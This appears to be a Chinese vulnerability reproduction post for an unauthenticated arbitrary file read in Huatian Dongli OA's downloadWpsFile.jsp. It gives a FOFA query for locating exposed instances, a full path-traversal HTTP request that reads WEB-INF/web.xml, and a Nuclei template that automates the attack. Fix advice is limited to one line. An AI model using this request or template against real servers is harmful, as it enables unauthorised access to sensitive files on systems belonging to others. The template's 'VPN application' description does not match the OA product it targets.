0x00 漏洞描述
华天动力OA是一款将先进的管理思想、管理模式和软件技术、网络技术相结台,为用户提供了低成本、高效能的协同办公和管理平台。 华天动力OA downoadWposFile,jsp 接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
0x01 测绘工具
fofa: app=“华天动力-OA8000”
0x02 漏洞复现
代码语言:javascript复制GET /OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/2
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
0x03 Nuclei检测脚本
代码语言:javascript复制id: 华天动力OA downloadWpsFile.jsp 任意文件读取
info:
name: 华天动力OA downloadWpsFile.jsp 任意文件读取
author: admin
severity: high
description: This template detects file inclusion vulnerability in the VPN application.
tags: file-inclusion, lfi
requests:
- method: GET
path:
- "{{BaseURL}}/OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml"
headers:
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0"
Accept: "text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
Accept-Language: "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
Accept-Encoding: "gzip, deflate, br"
Connection: "close"
matchers:
- type: status
status:
- 200
- type: word
words:
- "xml"
0x04 修复建议
建议在漏洞修复前尽量避免将系统暴露在互联网上或通过白名单限制访问 及时升级到最新版本: http://bj.oa8000.com/
0x05 免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。 请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。 作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。